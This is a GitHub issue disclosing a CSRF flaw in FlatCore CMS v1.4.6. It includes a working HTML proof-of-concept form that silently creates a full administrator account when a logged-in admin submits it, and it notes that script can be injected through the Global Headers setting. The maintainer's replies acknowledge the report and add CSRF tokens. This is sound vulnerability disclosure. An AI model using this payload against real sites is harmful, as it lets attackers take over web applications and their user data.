Skip to content
This repository has been archived by the owner on Jan 5, 2023. It is now read-only.

CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6 #27

Closed
shardulm94 opened this issue Apr 8, 2017 · 2 comments

Comments

@shardulm94
Copy link

Exploit Title: CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6
Date: 08-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. In the case of FlatCore, we can use CSRF to perform actions on the admin dashboard by targeting an administrator.

Exploit:
We assume that FlatCore is installed at http://localhost/. Our target is acp/acp.php?tn=user&sub=new&edituser= which is the page used to create a new user. The given POC will create a user on the website which has full administrator privileges.

<html>
<body>
    <form method="POST" action="http://localhost/acp/acp.php?tn=user&sub=new&edituser=">
        <input type="hidden" name="user_nick" value="testcsrf" />
        <input type="hidden" name="user_registerdate" value="" />
        <input type="hidden" name="user_verified" value="verified" />
        <input type="hidden" name="nbr_of_groups" value="0" />
        <input type="hidden" name="user_newsletter" value="none" />
        <input type="hidden" name="user_firstname" value="" />
        <input type="hidden" name="user_lastname" value="" />
        <input type="hidden" name="user_mail" value="csrf@csrf.com" />
        <input type="hidden" name="user_company" value="" />
        <input type="hidden" name="user_street" value="" />
        <input type="hidden" name="user_street_nbr" value="" />
        <input type="hidden" name="user_zipcode" value="" />
        <input type="hidden" name="user_city" value="" />
        <input type="hidden" name="user_psw_new" value="test" />
        <input type="hidden" name="user_psw_reconfirmation" value="test" />
        <input type="hidden" name="user_psw" value="" />
        <input type="hidden" name="drm_acp_class" value="administrator" />
        <input type="hidden" name="drm_acp_pages" value="drm_acp_pages" />
        <input type="hidden" name="drm_acp_editpages" value="drm_acp_editpages" />
        <input type="hidden" name="drm_acp_editownpages" value="drm_acp_editownpages" />
        <input type="hidden" name="drm_acp_files" value="drm_acp_files" />
        <input type="hidden" name="drm_acp_user" value="drm_acp_user" />
        <input type="hidden" name="drm_acp_system" value="drm_acp_system" />
        <input type="hidden" name="drm_moderator" value="drm_moderator" />
        <input type="hidden" name="drm_can_publish" value="drm_can_publish" />
        <input type="hidden" name="save_the_user" value="Save User" />
        <input type="submit" value="Submit!" />
    </form>
</body>
</html>

Before running the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The new user with admin rights should now have been created.

References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

Screenshots:
Before the exploit
image

Exploit Page
image

After submitting the form
image

New user added
image
With admin access
image

Impact: Compromises the entire web application and user data
Mitigation: Use of CSRF tokens

Creation of a user account was just an example. Other pages/settings in the admin dashboard are also vulnerable to CSRF. For example, the Global Headers (HTML) features can be misused to inject JS into the website.

@patkon
Copy link
Member

patkon commented Apr 8, 2017

Woah. Thank you for the detailed description. I'll try to fix that as soon as possible.

@patkon
Copy link
Member

patkon commented Apr 12, 2017

All forms in /acp/ now use CSRF token.
9a5e2c4

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants